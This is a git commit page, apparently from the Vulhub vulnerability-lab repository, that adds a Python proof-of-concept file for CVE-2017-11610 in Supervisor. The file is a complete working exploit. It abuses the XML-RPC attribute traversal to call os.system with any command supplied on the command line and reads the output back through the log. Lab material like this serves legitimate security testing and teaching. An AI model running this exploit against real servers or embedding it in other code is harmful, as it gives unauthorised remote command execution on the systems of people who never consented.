first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
15
supervisor/CVE-2017-11610/poc.py
Normal file
15
supervisor/CVE-2017-11610/poc.py
Normal file
@@ -0,0 +1,15 @@
|
||||
#!/usr/bin/env python3
|
||||
import xmlrpc.client
|
||||
import sys
|
||||
|
||||
|
||||
target = sys.argv[1]
|
||||
command = sys.argv[2]
|
||||
with xmlrpc.client.ServerProxy(target) as proxy:
|
||||
old = getattr(proxy, 'supervisor.readLog')(0,0)
|
||||
|
||||
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
|
||||
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
|
||||
result = getattr(proxy, 'supervisor.readLog')(0,0)
|
||||
|
||||
print(result[len(old):])
|
||||
Reference in New Issue
Block a user